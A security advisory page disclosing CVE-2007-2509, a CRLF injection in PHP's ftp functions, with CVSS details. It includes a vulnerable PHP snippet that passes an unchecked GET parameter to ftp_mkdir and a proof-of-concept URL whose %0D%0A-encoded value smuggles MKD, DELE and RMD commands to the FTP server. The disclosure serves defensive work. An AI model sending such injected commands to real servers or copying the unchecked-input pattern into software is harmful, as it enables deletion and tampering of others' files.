CRLF injection in PHP ftp function

Published
Credit
Risk
2007.05.12
fangxiaodun
Low
CWE
CVE
Local
Remote
CWE-20
CVE-2007-2509
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
2.6/10
2.9/10
4.9/10
Exploit range
Attack complexity
Authentication
Remote
High
No required
Confidentiality impact
Integrity impact
Availability impact
None
Partial
None

We found that there was one crlf injection in php ftp ftuntion.As same as http,you can inject a 'rn other command' in the paramer of a ftp function like ftp_mkdir,and then php would send the rn to your connected ftp server.The server considerd there is a new command,and the other command would be executed.
For eg:

<?php
$ftp_server='http://www.loveshell.net';
$ftp_user_name='loveshell';
$ftp_user_pass='loveshell';
$command = $_GET['dir'];

$conn_id = ftp_connect($ftp_server);
$login_result = ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
if($command) ftp_mkdir($conn_id, $command);
.......

Exp: http://www.loveshell.net/test.php?dir=loveshell%0D%0AMKD jnc%0D%0ADELE jnc.txt%0D%0Armd test

The dir loveshell and jnc are created,the jnc.txt is deleted,and the dir test is deleted.

tested on php 5.1.6,other function is vul also.

loveshell[at]Bug.Center.Team


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2015, cxsecurity.com